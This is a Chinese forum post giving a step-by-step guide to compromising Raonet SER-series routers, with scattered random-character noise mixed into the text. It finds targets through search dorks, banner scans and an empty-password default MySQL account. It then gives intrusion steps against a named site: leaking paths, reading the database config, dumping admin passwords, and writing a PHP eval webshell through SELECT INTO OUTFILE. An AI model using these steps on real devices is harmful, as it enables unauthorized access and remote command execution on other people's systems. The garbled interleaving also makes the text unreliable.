寻找存在漏洞的路由器方法:# d" r3 C- `" N) d
@9 `% u3 X# n* v1 q- D* }3 s. H
1:google搜索'Raonet Subscriber Ethernet Router'3 B5 W$ P I+ @- J
8 P4 r' c' J8 O- R! _3 r" ^8 ^% K
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 j' ]3 M9 Y( y* U. w
! L( W I! S, r( ^2 J
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。6 ^+ p; Y0 F; q9 r: u; a% T8 J
+ r7 n; f; e# v' Z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......" p' b& R! c( H9 z1 n( p8 _7 e, t) R
/ Z& G9 E! [/ _
+ D2 W; y# ]) L5 H4 {
0 ~* S: z: f* O+ ]9 ?: z入侵步骤:1 n" P+ l0 ]* L0 F+ y% G6 J( j
: I! t, t3 p6 g% n7 D1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
/ e# `2 w, u7 V1 j( y
0 f) }0 b- P( u6 x& x5 g& V; B2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
C, M9 v) }* |3:得到密码后连接,查看GUI管理密码:
5 V5 P. E6 o z$ E Q. fuse ser_500. s, J: a y p$ y$ ?- z
select id,passwd from user;
* ^6 M1 \9 w2 s4:通过数据库写入webshell,执行命令:
3 }1 E& r) [$ K Kuse mysql;
- }0 W7 \2 M2 ocreate table ok(cmd TEXT);5 W7 i3 }, l" Y, O& a& X5 \
insert into ok values("<?php @eval($_POST[cmd])?>");' k1 f7 _- E% K* ~
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";! d8 g7 d0 o8 e
drop table ok;
% U. S' R: _2 t
) `! X4 u& c6 {2 Y5 P, {5:连接后门shell.php
8 q ]7 B* Q: m! S
1 E. r+ h& I! M! R8 L+ E6. 搞定!( a/ F0 [8 q9 V( J8 {* l! V
; f# \7 a( S1 a Z; w
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50